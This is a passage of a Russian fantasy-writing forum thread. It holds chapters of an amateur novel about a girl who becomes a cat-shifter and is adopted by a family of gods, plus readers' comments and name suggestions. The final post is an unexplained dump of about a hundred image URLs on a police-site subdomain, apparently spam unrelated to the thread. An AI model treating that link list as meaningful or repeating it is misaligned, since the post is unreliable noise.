Другой Мир. Мир Фэнтези.

Объявление

Дорогие Гости, не сидим на главной странице, а регистрируемся! так же, у нас открылась Ролевая заполняйте Анкеты, читайте сюжет и играйте!)

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Другой Мир. Мир Фэнтези. » Пишем книги... » Открой занавесу...


Открой занавесу...

Сообщений 21 страница 40 из 100

21

R1T@ написал(а):

А мне она очень даже понравилась)))Хорошая глава)))И не надо ничего переделывать! *нахмурила бровки*

Правда? Тогда норм)) Но все таки довавить нужно))

R1T@ написал(а):

Очень жду не скорого продолжения)))

Напишу, как получиться))

22

~Милый чёртик~ написал(а):

Но все таки довавить нужно)

Ну на счёт добавления я не против)))

23

Глава 6.
Вот это подарочек на мою голову…

****
Создатель  Диармуид, сотворил планеты, и заселил их людьми и животными. Он, заботился о них, но через один век ему стало скучно, тогда, Создатель сотворил для себя женщину, свою богиню. Фиалийна, стала для Диармуида верной женой. Вскоре, через 14 месяцев (столько длилась беременность) у них родилось четыре сына, близнецы, но такие разные и рожденные с интервалом минута. Что творилось в это время на планетах и в мирах. Когда родился первый сын, и с первым его криком Солнце стало греть жарче и сильнее, сухие ветки затрещали и загорелись, лава в горах накалилась, и происходили извержения вулканов, сметая горячей лавой всё на своем пути, и последним с улыбкой мальчика, загорелись дрова в камине, смущенно горя, и весело потрескивая. Заметив это, Диармуид, назвал сына таким длинным именем, похожим потрескивание огонька в камине.
Когда, через минуту, родился второй сын. Во всех мирах поднялся сильнейший ветер, он подгонял лаву, созданную старшим братом. Он распространял огонь по вселенной, будто радуясь своему рождению. С улыбкой мальчика пламя в камине разгорелось ярче. Отец назвал его именем – по звучанию похожим на игривый ветерок.
Через минуту родился следующий сын. С его появление, моря вышли из берегов, и затушили разгоревшийся пожар. Наступила тишина, лава с шипение остывала. Мальчик был таким серьезным, нахмурив бровки, из поломанного фонтана весело журча, начала вытекать вода. Отец назвал именем, похожим на журчание спокойного ручейка.
И, наконец родился последний сын. Он был таким хмурым, и невозмутимым, что казалось этот малыш, знает все. С его появлением, планеты, покрылись мелкой травкой, и она была такой сочной, и красивой. Мальчик обиженно что-то сказал, и почти завядшие цветы в вазе, снова раскрылись.
И имя ему дали, похожее на происхождение земли, на таким же твердым, как сама земля.(Прим.Автора: Я знаю, что это бред, но ничего придумала =( может вы мне подскажите?)
На планетах наступила тишина и гармония. Вздохнув, Создатель ушел заселять их снова.
***

Четверо молодых людей сидели за круглым столом, и вели светскую беседу.
- А я говорю, вода главнее в чае – делая глоток напитка, сказал один из них.
- Огонь. Без нее бы, твой чай, не сварился – довольно ответил другой, рыжеволосый.
- Почему это его чай? Мой чай! Из чего сделана заварка? – возмутился темноволосый.
- Да хватит вам! Достали вы со своим чаем – пытался привести братьев к порядку беловолосый.
- Завидно, да? – трое споривших, радостно воскликнули.
- Да причем тут это? – удивился беловолосый.
- Он прав, хватит дурачиться – рыжеволосый с миг стал серьезным. – Сегодня у нее произошло совершеннолетие, по их законам. Отец дал двуипостаным второй шанс. – перед парнями появилось изображение девушки – Да, отец постарался на славу. Симпатичненькая….
- Ого, неужели тебе стали нравиться человеческие девушки? И, брат, не забывай, она нам как сестренка, получается – усмехнулся темноволосый, сам же и интересом разглядывая изображение – Эта девчонка чем-то похожа на меня – улыбнулся он.
- А характер мой – в столовую зашла, а именно там сидели парни, молодая, и очень красивая женщина. Её рыжеватые волосы, каждый день меняли оттенки, и сегодня они были медными. – Так что, идите и займитесь делом, вам отец передал – она направилась к кухонному уголку, - дети, а кто весь чай выпил? – она обернулась, и слегка растерянно посмотрела на то место, где сидели четыре бога. Не удержавшись, она рассмеялась. В кухню зашел  Диармуид.
- О чем смеешься? И где дети? – спросил он, обнимая свою спутницу жизни за талию.
- Да так, наши дети балуются. Вот только исче… то есть ушли знакомиться с сестрой – она нежно чмокнула его в щечку, и улыбнулась.

***
Врач слушает легкие больного и приговаривает: - Хорошо... Хорошо... Очень хорошо... - А что же хорошего? - Хорошо, что у меня такого нет!

Проснулась я точно не на кровати, а поняла я это, с пятой попытки, пытаясь найти одеяло. «Блин, опять сюрпризы?». Подул легкий ветерок, растрепав волосы, я слегка поежилась. Открывать глаза совсем не хотелось. Краем уха я уловила какие-то голоса. С ленью, разлепив глаза, и сев, я огляделась. Первым, что увидела, было четверо маленьких мальчиков, сидевших под огромным деревом.
Увидев, что я проснулась, двое подскочили и рванули ко мне, а оставшиеся, что-то взяли, и последовали за первыми.
- Привет – первым добежал рыженький, на вид ему было лет десять. Волосы были заплетены в косу. А глаза были цвета меда, такие, я ещё не видела.
- Привет - ответила я, чуть охрипшим голосом. Попытка встать не увенчалась успехом. Все-таки перевоплощение плохо отозвалось – Где это я? – спросила, держась за голову. Тут подоспели другие. Мальчик с не вероятно белыми волосами, убрав мою руку, дотронулся до моего лба. Постепенно, боль начала проходить, улыбнувшись, мальчик кивнул, и подал кувшин с водой.
- Ты нас не бойся, мы не кусаемся, - сказал один из них. И тут же протянул руку – Меня зовут Аристель. А тебя Юника?
- Да, Юня. – удивленно ответила я. «Откуда они знают, как меня зовут…»
- Я Таррсиль – представился рыженький.
- А я Нильвинель – сказал беловолосый.
- Дастринель – представился черноволосый.
- Очень приятно познакомиться – Так и не запомнив их имен. Только поняла, что рыжий, это Таррсиль. А блондинчик, с ярко-желтыми волосам это Аристель. – Мальчики, а можно вас хоть как-то покороче называть?
Они задумчиво переглянулись, потом темненький кивнул.
- Можно, первые три буквы наших и так сокращенных имен. – сказал он с улыбкой.
- А у вас, что, имена ещё длиннее? – с ещё более огромным удивлением посмотрела на мальчиков.
- Ну да, в нашем мире так принято – усмехнулся Ари – Пойдем под дерево, а то тут солнце, и слишком жарко.
- Чем тебя солнце не нравится? – привычно возмутился Таррсиль.
  Мы сидели под деревом, дети рассказали мне свою историю, хотя они и не какие не дети.
Они меня где-то в 100000 раз старше меня. Старики. На счет внешнего вида. Если я буду им доверять, и полюблю, то они начнут расти. Это, что-то вроде испытания для меня. Мне уже любопытно узнать, то какие они на самом деле.
- У тебя уже рассвет, и тебе пора уходить – расстроено сказал Нил. – И, кстати, с днем рождения, сестренка – добавил он. И все четверо исчезли, рядом со мной, осталась лежать маленькая, как карманный справочник, книга в золотом переплете.
«Открой её, и вернешься домой. Мы будем ждать тебя, возвращайся к нам…» - услышала я у себя в голове чей-то голос, кажется, бога воздуха… Я посидела под деревом, и разглядывала книжку. Доверие, это и есть доверие? Оно заключается в том, что бы просто открыть книгу?
- Ладно, была не была – зажмурив глаза, я открыла книгу. Ничего не происходило, прошло где-то минут пять. Устав ждать, я открыла с начала один глаз, и от удивления распахнула второй. Я уже сидела в своей комнате, одеяло лежало на полу, подушка где-то там же. Нагнувшись, с ленью достала, и положила на место.
Время тянулось долго, думать не о чем не хотелось, все же у меня сегодня день рождение. Не заметив, я опять уснула, и проснулась от тихого шептания, и шороха.
- Может не будем будить, пусть поспит – неуверенно спросил папа.
- Не-е-ет, пора вставать – хихикнула Майка. «У-у-у-у злодейка» - подумала я, и все же открыла глаза.
- С Днём Рож-де-ния! – завопили папа с Майей. Блин, у меня между прочим голова болит.
- Дайте, ребенку нормально проснуться – возмутилась откуда-то сбоку тетя Ангелина.

***

День рождение. Люблю этот праздник. Но когда у тебя вечно болит голова, и иногда слышно чужие мысли, то это уже не то. Это мучение.
Я пыталась сосредоточиться, но ничего толком не получалось. Единственное, что случилось, так это маленькое событие. Нечаянно, я смогла превратиться в кошку, вернее не в кошку, а в маленького, черного котенка.
- Какой миленький – восхищенно пискнула Майка, и схватила меня на руки. Я помещалась почти в одну её ладошку.
- Иди в баню! – рявкнула я, и укусила её за палец. Почему я такая маленькая? Вроде, вчера была огромной.
- Кирилл, скажи, она всегда такая будет? Или вырастит? – с философским видом спросила Анги у папы.
- Нет, она уже большая. Но, как я сейчас понял, может менять размер. Возможно, из нее получится хороший шпион и боец. – Довольно сказал папа. «Блин, я вообще ничего не хочу!»
- Так в шпионы берут «птиц» или «псов». – немного озадаченно проговорила Тетя Ангелина.
- А теперь ещё и кошек. Таких, как Юня ещё не было – самодовольно хмыкнул папа. В его мыслях, я уже была в форме бойца. «Ещё чего!» - «Теперь», потому что главный советник короля, так решил.
- Может уже… - вместе с подругой начала я. – Продолжай ты… - снова в один голос. Мы с Майкой захихикала.
- Может уже, будем, есть торт? – спросила Майя.
- Может уже, вы мне поможете стать человеком? – возмутилась я. Зная, что подружка может не дождаться, и все съесть.
- А зачем? Ты тортика меньше съешь, вон какой животик маленький – папа «пересадил» меня к себе на ладонь, и ткнул пальцем в живот.- Какая милашка.
- Ай – я тоже цапнула его за палец.
      Через минуту, я сидела довольная и ела долгожданный торт.
- Фкуфно-о-о – я вздохнула, а так как рот был забит, чуть не подавилась. Тут же две руки хлопнули меня по спине. – Больно-о-о!
- Ну и что? – хладнокровно спросила Любимая подруга.
- Ничего! Приятно подавиться Моим тортом! – обиженно сказала я, и надула губы.
- И тебе того же, и без хлеба – не осталась в долгу Мая.
- Пап, а мы пойдем в ресторан? Ты обещал. – Решив не обращать на Майку своего драгоценного внимания, спросила я у отца.
- Вечером – он все же улыбнулся, и перестал «обижаться». Он хоть и делает недовольный вид, но я теперь знаю, папа хотел, чтобы я стала такой. – Только с одним условием, как только, твоя аура станет ощутимой, и более ясной, ты отправишься в штаб. Тебе нужно отметиться, и получить «паспорт», и прочие документы.
- Ла-а-адно – я покорно вздохнула. Вообще, я подкупный человек, особенно если это подарки или что-то приятное для меня. Но, только, подкупна я для отца. А не то, что вы подумали…
- Тогда, до вечера – улыбнулась Ангилина, и встала из-за стола, - мне пора, нужно идти, дела.
- И мне тоже, там молодого вампира на нашей территории задержали, и без регистрации, пойду выбивать из него информацию. Мам, Кирилл, можно мне сегодня Руслана с собой в ресторан взять? – спросила Мая, так же вставая из-за стола.
- Можно! – воскликнула я, опережая всех. Мне очень хотелось посмотреть на того, кто завоевал сердце моей подружки.

Все странности и неясности, начали забываться, и я пошла в свою комнату. Сегодня, я должна быть красивой. Это же мой день, мой праздник...

24

Продолжение прикольное))) (я его давно прочитала, просто коммент забыла оставить ) А когда следующая глава будет?

25

***

Портить свое день рождение я никак не хотела, и по этому  вот уже второй час крутилась перед зеркалом. Слышно было, как на первом этаже ворчит папа, и через некоторые интервалы зовет меня спуститься, а я уже пол часика кричу ему свое любимое «щас».
С платьем я давно разобралась, а вот с волосами еще нет. Такое ощущение, как будто они стали гуще, и темнее. Я пригляделась внимательней, и тут….
- Здравствуй – произнесло зеркало. Не ожидавшая этого, я отскочила. Мое отражение начало меняться, и в зеркале появилась Тамина. Женщина была чем-то неуловимо похожа на меня, только различался цвет волос и глаз.
- Привет – буркнула я, пытаясь разглядеть свое отражение.
- Помочь? – с усмешкой спросила она, и тут же легкий поток воздуха поднял мои волосы, через миг, волосы были собранны на затылке в замысловатую прическу, а спереди свободно висели два локона. – Тебе идет – почему-то грустно сказала она, и исчезла.
- Спасибо – ответила я, и, подкрасив губки, выскочила из комнаты. Встретили меня радостно, но во взгляде папы, я заметила что-то другое.

Пришли мы первыми, и теперь дожидались Ангелину, Майю, и её парня. Я не выдержала, и уже съела кусочек торта, а папа разговаривал по телефону. Почему он так странно смотрит на меня? Хочется спросить, но почему-то понимаю, что этого не стоит делать. Только почему? А еще Тамина была сегодня очень странная, и наверно, мне показалось, что от нее отходило тепло, такое знакомое, но для меня чужое. Я заметила в её глазах заботу и доброту, может по этому она и называется Повелительницей, матерью для всех Двуипостасных… Двуипостасные или все-таки оборотни? Нет, оборотни превращаются в полнолуние, а я вчера спонтанно, и вернулась в человека по собственному желанию. Тогда все-таки кто же я? Как папа говорит: «Таких, как Юня ещё не было». Но почему именно кошка? Хотя мне нравится, вот только нужно разобраться…

- Привет. – Я даже и не заметила как тетя Анги и Майка пришли. Оторвавшись от мыслей, я подняла голову. Это и есть Руслан, парень Майи? А мне он представлялся совсем по-другому.
- Юняяяя, хватит так его рассматривать – сердито пробурчала подруга – и будь вежливей, поздоровайся, что ли.
- Привед, медвед – хихикнула я, и показала Майке язык. – Присаживайся – я двинула стул Руслану, и он сел. Мая присела с другой стороны от меня. – Меня зовут Юня, а тебя Руслан, и ты парень Маи? Так?
- Так – совершенно спокойно ответил он. Ну уж нет, от меня он так просто не отстанет, я намерена узнать совершенно всё. На губах парня появилась легкая улыбка. Ммм…он что, понял, что я хочу? Мысли прочел?
- Юнь, Руслан может прочесть все, что у тебя написано на лице, а у тебя очень интересная мимика – с каким-то ехидством сказала подруга. А она то откуда узнала? Я повернулась к ней.
- Майя улавливает и управляет эмоциями, по ним тоже можно прочесть информацию, – ответил папа. – Только она еще молода, и дар развит не полностью. – добавил он, я повернулась к нему. – У меня много чего, я же не просто так добился должности советника короля.
Я хмыкнула.
- А тетя Ангелина?
- То же самое, что и у Майи, только дар развит полностью. Об остальном, знать не обязательно. И еще, Юника, прошу, не называй меня «тетя Ангелина», я же не старуха.
- Ага, не старуха, мам, когда я узнала, что тебе аж… - рот Майки закрыли и держали, подружка сперва вырывалась, но потом смирилась, что ей не дадут сказать правды.
- И давай, милая моя, на «ты» - продолжая мило улыбаться, продолжила Ангелина. Убедившись, что дочка молчит, отпустила и поцеловала её в щечку, в виде компенсации.
Ну вот, ужин по случаю моего дня рождения начался. Через некоторое время я была готова продолжать допрос.
- Руслан, скажи, сколько тебе лет? – склонила я голову, выглядел он очень молодо, лет на восемнадцать-девятнадцать, не больше.
- Семнадцать – хитро прищурив глаза, ответил он. С ними со всеми, я чувствовала себя «Беллой» из «Сумерков».
- И давно тебя «семнадцать»? – спросила я знаменитой фразой Беллы. Если он ответит «уже да» я заржу. Папа скривился, он не выносил это фильм.
- Уже – да – не моргнув глазом, ответил он. Вот гад! Видно тоже смотрел.
- Я знаю кто ты – хихикнула я, и оглянулась на остальных, мне показалось, или был какой-то шум. Папа, Анги, Майка, уткнувшись в стол, тряслись от смеха. Паразиты. – Ладно, так спокойно! – отдышавшись, сказала я. – Скажи честно, тебе вообще сколько лет?
- Сорок два. Уже глупо отнекиваться, ты все равно узнаешь. – Улыбнулся он.
- Ааа…ого. Ты между прочим тоже старик.

Простите, что так мало((
Будет еще, только как с поступлением своим разберусь)

26

О, прикольная прода. Особенно момент про " И давно тебе семнадцать?". Да, жать что так мало((

27

Еще один кусочек бреда))))

Глава 7
- Дую  спик инглиш?
- Дую, но плохо!

***

После моего дня рождения прошло два дня, эти два дня, я никак не могла увидеться с Майкой и Русланом. Было скучно. Еще вот папка куда-то с утра ушел, сказал, что по делам дня на два. Ужас какой, и что мне делать? Я же со скуки умру, ну или еще раз в доме приберусь. Убирая плюшевого мишку на тумбочку, наткнулась на золотистую книжечку, но вспомнить, откуда она – не могла. Пару раз повертев в руках, попыталась прочесть информацию, так, как учил вчера папа. Почему-то, сознание подсказывало, что открывать её, пока не вспомню, не следует. Хорошо, будем вспоминать… Зеленый луг, большой дуб, четверо мальчишек – богов стихий, доверие, любовь, дружба…
- Точно! Это же книжка тех четырех разноволосых мальчишек. Или стариков… Что-то я совсем запуталась. – От этих простых действий, разболелась голова, и я легла на кровать. Они хотели, чтобы я вернулась к ним, и я чувствую, что Таррсель, Нильвинель, Аристель, Дастринель ждут меня. И довольно давно… Может следует попробовать? Что-то и я сама по ним соскучилась, хотя и знаю часа три…
- Ладно, - в слух сказала я, - всё равно папы не будет денька два, и мне ску-у-учно. Не люблю скуку! – решившись, но при этом, зажмурившись, открыла книгу на первой страничке. Никакой вспышки, ничего не было, я открыла глаза, и была разочарованна.
«Настоящее доверие, и дружба к нам… Иначе, мы никогда не увидимся…» - прошелестел голос Тара голове. А я, боясь, что он исчезнет на всегда, потянулась за ним, желая увидеть четверых вечно спорящих мальчишек…
  Комната поплыла перед глазами, проморгавшись, с опаской огляделась. Стояла я в чужой, огромной гостиной. Глаз зацепила лестница, ведущая на верх, прям как у нас дома. Что-то наподобие дивана, было закидано разноцветными подушками, по бокам кресла, и еще два возле огромного камина в стене. В противоположной стороне от камина висела огромная картина, на которой были изображены уже знакомые мне мальчики, только тут они были по старше, лет где-то на девятнадцать-двадцать. «Значит вот какие они, на самом деле…» - промелькнула мысль. Рядом с парнями, по-видимому, стояли их родители, хоть все и были разные, но одновременно похожи. Невольно, я залюбовалась этой парой. Мужчина – а это был мужчина, а не парень, хоть и выглядел молодо, одной рукой придерживал развевающие серебристые волосы, длиной до лопаток, а второй нежно обнимал девушку, ну или женщину, кто их разберет. Взрослой женщиной назвать её было трудно, хоть глаза и излучали любовь и заботу, но в их глубине можно было заметить детское озорство, шалость, и было такое ощущение, что эта девушка со светло-каштановыми волосами кому-то уже успела нагадить, а теперь боится быть пойманной раньше времени.
  - Ого, все так и было – Произнес певучий, женский голос за моей спиной. Я, засмотревшись, даже и не заметила, что в комнате появились еще люди. Повернувшись к говорившему, я замерла, на меня, со смешинками на глазах смотрела нереально красивая девушка с картинки, то есть с картины, которую я минут двадцать разглядывала. – Я Диармуиду кринку подложила – смотря на картину, и приобнимая меня за плечи, начавла рассказывать она, заметив мой недоуменный взгляд, пояснила. – «кринка» - это как в вашем мире кнопка, только из дерева. У нас тут, как оно же называлось… железо нет.
- Нет ничего металлического? – удивленно переспросила я, ого.
- Да, нету – кивнула она. – Ну так вот, Даирмуид так и сидел то время, пока нас на рисовали. Ну и лицо же у него в конце было – засмеялась она, и я, представив эту картину, заразилась от нее смехом.
- Так это ты была?! А я думал это кто-то из мальчишек – донесся со второго этажа сердитый голос – Лийна, ты мне только попадись! Накажу!
- Упс… - хихикнула девушка, и быстро потащила меня в какую-то сторону, я и не сопротивлялась. Оказались мы в кухне, сверху все ещё слышалось сердитое бурчание. Всё еще хихикая, хозяйка дома, повесила на двери табличку: «Не входить, взрывоопасно! Я у плиты!» А потом продолжила – Конечно, было опасно, если бы он меня поймал, но чтобы посмотреть на его лицо, это того стоило. И вообще, прошло несколько веков, а он все еще помнит, видите ли, лицо у него перекошенное вышло!– Закончила она. Мдя… весело живут…
- Я все слышу! – донеслось с верху. – И скоро подойду.
- Если хочешь, то можешь еще поспать… – милым голоском ответила она. – Кстати, Юника, давай знакомиться – улыбнулась она, и протянула кулачок – Фиалийна, или для тебя, дочка, можно Лийна. Не зная, что делать в ответ, ответила.
- Э-э Юника – засмеявшись, Лийна, слегка стукнула по моему запястью, и попросила сделать тоже самое.
- Так Боги приветствуют друг друга и знакомятся. – Пояснила она. – Я знаю, как тебя зовут, и про всю твою жизнь тоже знаю.
- А вы тоже Бог? – запоздало спросила я. Чего-то я сегодня торможу.
- Да, Бог Жизни. Пятая стихия со своими сыновьями. Дочка, и мы же договоримся общаться на «ты» - немного обиженно спросила она. Я кивнула. И чего она меня дочкой называет? Не мама же она мне.
- Нет, я тебе не мама – грустно сказала она. Блин, никак не могу привыкнуть, что мои мысли могут читать – Юника, прости меня, я не успела спасти твою маму. Понимаешь, враги вашего клана, всеми силами не хотели, чтобы дочь Советника Короля Перевертышей – родилась. Вот они и что-то подсыпали твоей матери. Роды начались раньше времени, и вы двоя могли бы погибнуть. Дастринель, в это время смотревшись за вашим миром, поздно меня позвал. И так получилось, что дать жизнь можно было только одной из вас. – Я слушала тихо-тихо, боясь пропустить хоть одно слово.
- Лийна, я вот не могу понять одного… Почему Боги стали помогать простой женщине, рожавшей ребенка? – Набравшись смелости, спросила я.
  - Твоя мама, была не простой женщиной, она, как и ты, была перевертышем, но, в пятьдесят лет, отказалась от силы, в помощь одному богу.
- Какому? – вмешалась я.
- Адарсинею, Богу смерти. Шестая стихия… И он двоюродный племянник Диармуида. За спасение, Элисана, отдав силу, заключила договор с Создателем, что тот будет защищать её дитя, и подарит вторую ипостась. Вот так она и стала человеком. – Фиалийна присела рядом со мной, и обняла. – Перед смертью, она попросила Адарсинея  передать нам, что Диармуид и Фиалийна считаются твоими крестными. Вторыми родителями… Юника, ты будешь согласна, если я и Диар, будем называть тебя дочкой? – шмыгнув носом, я кивнула.
  - Спасибо. Я всегда  мечтала о такой маме – улыбнулась я.
  - А я о дочке – донеслось с двери, кстати, я опять не заметила, что кто-то вошел. – А то четверо оболтусов, вечно в бегах, оружия им подавай, и так далее. А мне хочется что-нибудь более спокойное. – с мечтательной улыбкой произнес «дядька» с картины. Диармуид, кажется. Фиалийна сделала взгляд, типо: «Ну-ну». Ну да, ей же лучше знать, какая я. Да и характером мы с ней похожи… Сильно.
  Проходя мимо нас, он щелкнул Лийну по носу, та недовольно фыркнула.
- Юнь, знакомься, наш Создатель Диармуид бе-бе-бе бе-бе-бе-бе, полное имя ты все равно не запомнишь – с вредной улыбкой представила она мужа. – Сам, оболтус – добавила она.
- Знаете, - добавила я – Я как-то иначе представляла себе Богов, а Создателя тем более. В моем преставлении, Создатель – это некий старикашка, простите меня, с длиннющей, седой бородой, и с мудрыми, серьезными глазами. – Раз они меня взяли на воспитание, то можно и понаглеть. Чуть-чуть. Совсем чуть-чуть…
- Дома можно – с улыбкой отмахнулся «папа». Как не привычно то как… Хотя, в принципе, он мне и так и так считается папой. Создал же.
- Ой, скоро мальчики подойдут, а я обед не приготовила – засуетилась «мама», выталкивая Диара за дверь, перед этим сунув в руки яблоко – Перекуси. – Повернувшись ко мне, она улыбнулась – Поможешь? – я радостно кивнула.

28

Люди, у меня к вас просьба, придумайте муское имя, какое-нибудь заковыристое, плиииз... Без этого ничего не идет, я имена всем персам придумала, а потом вспомнила, что нужно еще одно, без него никак *плачет*. (С уклоном на современное)

29

Теодорус, Микаэлист, Дарвилин, Сашамирили, Кириос, Эрдэс, Лирин =)))

30

смородинка.
Классно, жду продолжения, хотя я в таких сложных именах запуталась О_о. Скоро мозг себе сломаю хД

31

Bloody Tulip

Bloody Tulip написал(а):

Микаэлист, Дарвилин, Сашамирили

божеее, ну не такие же заковыристые))

Illusion
Спасибо, дочурка)* надеюсь, продолжение скоро будет)

32

Irurah

https://21.mvd.ru/upload/site24/document_images/7Je9kn7wlD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/RbEPksbMcC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/vjCFzmzmY4-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/EhoUcMjNSM-100xx100.jpg
https://21.mvd.ru/upload/site24/e2d283291173d6c916fb1a781a9e7e67-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF.jpg
https://21.mvd.ru/upload/site24/document_images/DpPwKfBR1T-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ajBOs35gME.jpg
https://21.mvd.ru/upload/site24/document_images/1TIrckss7t-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/3tMDElwjQW-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/VWjexshyE6.jpg
https://21.mvd.ru/upload/site24/document_images/JAAhIdpdEl.jpg
https://21.mvd.ru/upload/site24/document_images/zdaXRjvxJR-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QJDvuVynWh-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/d9B65ffQvz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/O4KrispYUt-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zw3vWpNBk8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/NVQrNOgtJO.jpg
https://21.mvd.ru/upload/site24/document_journal/jh46ZfEdoc-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/J8tBUsLcQL-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/FskCYQt5xA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/wnN23ELe9u-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF.jpg
https://21.mvd.ru/upload/site24/document_images/XLmvHwGeBE-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn.jpg
https://21.mvd.ru/upload/site24/document_images/CrJler6Rr4-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ivvYEMQgLp.jpg
https://21.mvd.ru/upload/site24/document_images/qisepHBa4A-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Tiq5yldZbo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/uzW4VX8Ct0.jpg
https://21.mvd.ru/upload/site24/CPSDBYlDxZ.png
https://21.mvd.ru/upload/site24/document_images/rAlXtdS4vA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Az0mH0NFoV.jpg
https://21.mvd.ru/upload/site24/document_images/TC4yZmsqnd-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/8TQDrvn7J2-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u.jpg
https://21.mvd.ru/upload/site24/document_images/YLaF5aRAiV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MW1eAQMs45-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/sw4JtZm6qD-300x300.jpg
https://21.mvd.ru/upload/site24/WUsKLBp6AQ-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/WRriDXydhD.jpg
https://21.mvd.ru/upload/site24/document_images/Zbp4BkXPCE.jpg
https://21.mvd.ru/upload/site24/document_images/vJ7xNAZVXL.jpg
https://21.mvd.ru/upload/site24/document_images/isnLSdtrq6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/iZVCyAZ3EA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bhc31ANtiF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/WCRJoCIyea-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zMJXR7qNWC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Yhjy5Wkg9I.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/om4AfnKcyW-630xx225.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi.jpg
https://21.mvd.ru/upload/site24/document_images/JKeErALnbD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ioQv6KZ50J.jpg
https://21.mvd.ru/upload/site24/document_images/GxeQK8sd7F-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/W3CWjiMhwO-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/k9xqehQTEE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sunlkpR5ut-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lgRMOefxzQ.jpg
https://21.mvd.ru/upload/site24/document_images/8T8EyY6Uxy.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK.jpg
https://21.mvd.ru/upload/site24/document_images/zWoJnm5M27-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/6185FQjEDq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/4r1RJ1pvy3-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/JGxN0RvLC7.jpg
https://21.mvd.ru/upload/site24/document_images/QUoga6Sn4g-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eoLnmCnFzO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb.jpg
https://21.mvd.ru/upload/site24/document_images/dSmGvU6Ugy-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ND0Nchw9tV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tIRp1MFhu.jpg
https://21.mvd.ru/upload/site24/document_images/WyBPr7zeve.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/9HOeroWBX5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oRjdOhGVHk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MtI5QEjtim-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eY4JfHxMXk.jpg
https://21.mvd.ru/upload/site24/DG60Ff7Htj-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/FYQVgB2t53-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UnilaluFl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MZo96WnYmB-100xx100.jpg
